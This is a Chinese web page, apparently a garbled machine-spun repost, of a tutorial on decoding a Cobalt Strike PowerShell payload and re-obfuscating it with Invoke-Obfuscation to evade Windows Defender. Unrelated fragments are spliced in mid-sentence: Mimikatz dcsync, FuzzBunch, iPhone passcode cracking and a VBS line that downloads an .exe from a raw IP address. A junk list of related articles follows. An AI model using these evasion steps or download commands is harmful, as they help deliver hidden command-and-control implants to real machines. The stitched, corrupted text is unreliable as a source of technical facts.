ddos进犯:Cobalt Strike:运用混杂技能绕过Windows Defender

访客4年前黑客文章359

在浸透测验中,红方选手想在不触发任何警报、引起政策警惕的前提下成功开释侵犯载荷始终是一项十分赋有应战的使命。与其他安全解决方案相同,Windows Defender在检测Cobalt Strike等东西所生成的通用型侵犯载荷方面现已体现得越来越好。

在本文中,我们将通过Cobalt Strike生成一个PowerShell侵犯载荷,然后修正这个载荷,绕过Windows 10主机上设备的Windows Defender。尽管这并不是在Windows Defender眼皮底下躲藏侵犯载荷的更高雅或许最简略的 *** ,但通过我们的验证,该 *** 确实有用。

 

二、载荷创建及混杂

创建载荷的进程如下所示:

操作完结后,我们可以得到包括PowerShell指令的一个payload.txt

假如我们在政策PC上直接工作指令,那么Windows Defender会将这种行为标识为风险行为。

为了绕过Windows Defender,我们首要需求了解Cobalt Strike怎么发明侵犯载荷,然后再修正载荷的特征,期望这种 *** 能骗过Windows Defender。

清楚明了的是,这段载荷指令通过base64编码,我们可以调查数据格式或许其间的-encodedcommand这个PowerShell标志来承认这一点。

为了解码这个指令,我们需求删去其间的powershell.exe -nop -w hidden -encodedcommand字符串,保存剩下的字符串,然后运用如下指令完结解码:

echo 'base64 payload' | base64 -d

解码出来的字符串仍然包括base64编码的字符串,但假如选用相同 *** 进行解码则会生成乱码。依据PowerShell指令中的IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()句子,我们可以知道这段字符串通过Gzip紧缩处理过。

现在我们需求了解这段数据中的真实内容,由于正是这段数据(即载荷)触发了Windows Defender的警报。运用Google一番搜索后,我发现这段PowerShell脚本的功用与http://chernodv.blogspot.com.cy/2014/12/powershell-compression-decompression.html脚本的功用彻底一致。

$data = [System.Convert]::FromBase64String('gzip base64')$ms = New-Object System.IO.MemoryStream$ms.Write($data, 0, $data.Length)$ms.Seek(0,0) | Out-Null$sr = New-Object S

◆丰盛的处理才干-每个记载都有标题,能被更好的辨认

ystem.IO.StreamReader(New-Obje通过跟踪研讨,Proof point 指出该途径会常常更改证书来使其在其用户设备上设备的运用程序合法化,以避免被苹果检测到。ct System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))$sr.ReadToEnd() | set-clipboard

这个脚本首要会运用base64算法解码字符串,然后解压所得成果,毕竟向我们出现完好的代码。代码还会将输出成果复制到剪贴板,便利我们粘贴到文本文件中,以便稍后运用。

$var_code变量保存的是详细的载荷,Windows Defender会检测到这个载荷,因此我们需求换掉这部分数据,绕过检测。

进一步解码$var_code后,我们发现这是一堆AS7、新增Windows Event日志 if (n == null) {工作条目CII字符,但此刻我们还不需求彻底解码这部分数据。

$enc=[System.Convert]::FromBase64String('encoded string')

我们可以运用如下指令读取其间部分内容:

$readString=[System.Text.Encoding]::ASCII.GetString($enc)

上面这部分数据可以奥秘我们一些信息,比方user agent字段以及我们所运用的IP地址。

现在我们的政策是处理当时的载荷,对其进行混杂处理,使其可以骗过Windows Defender。关于这个使命,更好的一个东西就是Daniel Bohannon所开发的Invoke-Obfuscation,我们可以参阅Github页面了解更多细节。

调用Invoke-Obfuscation的指令如下所示:

Import-Module .Invoke-Obfuscation.psd1Invoke-Obfuscation

现在我们需求指定待混杂的载荷数据,我们可以运用如下指令完结这一使命:

Set scriptblock 'final_base64payload'

这款东西可以处理我们供给的脚本代码数据,然后问询我们要怎么持续处理这段数据。在本文事例中,我选择的是COMPRESS以及子选项1。其他选项应该也可以试一下,但关于这个场景,我发现该 *** 确实卓有成效(到本文编撰时)。Invoke-Obfuscation可以担任大任,打印出一段比较紊乱的PowerShell指令,足以绕过Windows Defender。

接下来我们只需求输入Out指令以及待保存的PowerShell脚本的详细途径:

Out c:payload.ps1

之前操作进程中解压出来的载荷数据如下所示:

依据前文的分析,明显我们需求替换[Byte[]]$var_code = [System.Convert]::FromBase64String这部分内容,将其替换为Invoke-Obfuscation新创建的载荷。为了完结这个使命,我界说了一个新的变量$evil,用来保存Invoke-Obfuscation的输出成果。

重要提示:我们需求除掉Invoke-Obfuscation输出成果中|字现在,你将看到你的Kali Linux虚拟机和系统设置,我们现在需求做的就是点击“翻开此虚拟机电源”选项。符后边的数据,由于这是用来实行载荷数据的指令。我们不需求这条指令,由于Cobalt Strike模板会帮我们完结这个使命。

将修正后的脚本保存到PowerShell文件中然后加以实行。生成的成果可以作为Cobalt Strike中的beacon,假如我们运用的是@sec_groundzero开发的Aggressor Script,这就是其间的Slack告诉。

 

三、总结

假如我们运用Process Hacker来比照原始的CS载荷以及修正后的CS载荷,我们会发现修正操作并没有改动beacon的行为 *** ,并且成功规避了Windows Defender。

本文翻译自:www.offensiveops.io
如若转载,请注明出处:www.offensiveops.io

ddos进犯:Cobalt Strike:运用混杂技能绕过Windows Defender

#创建文件描述符,以可读()可写(>)的 *** 相关管道文件,这时候文件描述符3就有了有名管道文件的全部特性2. OD常用操作因此UEBA一个特征就是要能处理多个数据源的许多数据,这些数据源格式不同,速率也很快,后续的数据处理可以从结构化/非结构化提取有价值信息,数据处理是数据开掘和猜想分析领域的连续扩展,也是一门单独的学科:知识发现和数据开掘。数据源分为实时和离线,实时连续监测分析传入数据,一般不考虑历史数据和第三方数据相关,由于对功用有影响。Cobalt Strike:使用混淆技术绕过Windows Defender

ddos攻击‘appVersion’: ‘67.0.3396.87 (3396.87)’,实行”g”指令,能看到Bitmap回来的句柄被打印出来了满足CP的产品选择

1.单击EC2并创建新实例(EC2 == AWS Servers)。之后,选择Ubuntu Server 14.04 LTS。这时候转发一个80端口,协作hsf写入hook树立一个暂时的垂钓链接。Mimikatz有一个功用(dcsync),运用目录拷贝服务(DRS)从NTDS.DIT文件中检索暗码哈希值。该技术消除了直接从域控制器进行认证的必要性,由于它可以从域管理员环境中归于域的任意系统实行。因此,这也是一项用于红队的标准技术。KILLATTKddos攻击

视频中,3个iphone在12分钟内都被破解了。但很明显,iphone的暗码是被特别设置的,分别是0015,0016和0012,在破解设备上你可以设置破解暗码是从0000初步的。所以这样一来,能猜到0015也并不是那么困难了。假若你设定的是六位暗码,并且短时间内也没有改暗码,那这个小东西估计能跑十年左右。由于多一位暗码就会将遍历的时间增加10年。不知道怎样工作FuzzBunch的,请参阅我的上篇博文,操作 *** 和前次相同。TargetIP写靶机IP 202.X.X.X,CallBack写工作fb的IP,也就是172.26.97.35,不运用Redirection由于有UPX(3.91)版其他壳,这儿会发现运用官方的UPX –d 无法进行脱壳

打印言语是控制打印机作业的一个指令集,它奉告打印机怎样组织被打印的文档,在打印机言语的控制下,从计算机传来的打印数据被转化成可供打印的文字和图像,毕竟被打印机辨认并输出出来。打印言语抉择着激光打印机输出版面的凌乱程度,是衡量激光打印机功用的一个重要政策。 unsigned int mod = n % 4;Cobalt Strike:使用混淆技术绕过Windows Defender

ddos攻击备份 *** : }3. 翻开文件夹,成功运用

检查ip dns地址 如图所示,我们知道这是一个 C# 程序。 callbacks.setExtensionName("AES encrypt Java edition");//插件称谓 Linux:ddos攻击

#endifPost.Open "GET","http://192.168.174.145/ssss2.exe",0Cobalt Strike:使用混淆技术绕过Windows Defender

*** 电视,以及其他所谓的物联网设备,从出世它们的缝隙就一贯没断过。这次我们要介绍的是针对Vizio智能电视的中间人侵犯,它在与服务器验证HTTPS证书时是可以被绕过的。在第二轮消息流转中,该条消息将会与其他消息混编到一起,每台服务器都用只需自己知道的随机方式打乱一次该批消息的次第,然后将那些消息再乘以另一个随机数。当然解密和检索是很重要的,该进程逆序走一遍,当消息毕竟一遍流经各服务器,全部这些随机数都被除掉并被替换为该消息原有的密钥,这样收信人就可以解密并阅读消息了。下载地址:点击我


本文标题:ddos进犯:Cobalt Strike:运用混杂技能绕过Windows Defender

相关文章

顶级黑客系统电影(十大黑客电影)

顶级黑客系统电影(十大黑客电影)

本文导读目录: 1、有那些经典的关于黑客的电影 2、国内以黑客为题材的电影有哪些? 3、关于黑客的电影有哪些 ,多说点!! 4、欧美黑客题材的电影有哪些推荐? 5、好看的黑客电影排行...

直播行业变迁,“体验式直播”步入“美好时代”

直播行业变迁,“体验式直播”步入“美好时代”

2020年的疫情催熟了直播行业,各大直播平台不断推陈出新,想要趁着发展的浪潮占据自己的一席之地。本文将从直播行业的角度谈谈这场变迁,希望能对在直播行业的互联网人有所帮助。 “商业进化论”的中国第一人...

在哪里可以找黑客接单

百度搜索白客接单,希望对你有帮助 安全措施1、登录页面加密在登录之后实施加密有可能有用,这就像把大门关上以防止马儿跑出去一样,不过他们并没有对登录会话加密,这就有点儿像在。 请先给出明确答复:黑客接单...

华为mate30pro有红外线功能吗

以EMUI10.1.0.162系统软件为例子,华为公司mate31080ro有红外线作用。适用红外信号作用,适用红外线传感器,能够将全部的电器产品遥控器集中化到手机,真实完成了一台手机控制全部电器产品...

微信里面的图片过期怎么恢复(微信图片过期能恢复)

微信聊天记录怎么恢复?小伙伴们有没有手贱或者手误左滑删除了微信聊天对话框?再打开与好友的聊天对话框,一看竟是空。 恢复不了了,只能看缩略图了。 微信图片已过期怎么找回来 你好!你可以先看看是否有把这张...

给女儿扎头发简单发型一周不重样 宝妈奶爸快看过来

给女儿扎头发简单发型一周不重样 宝妈奶爸快看过来

闺女讨人喜欢爱卖萌真的是父母心中的宝,但是,每天早上给孩子扎马尾真的是糟透了心。要想小孩外出美美哒的,但是常常扎出不来漂亮的小孩喜爱的头型。乃至有时爸妈不在家,父亲要给孩子扎马尾!如今让我教你巨简易的...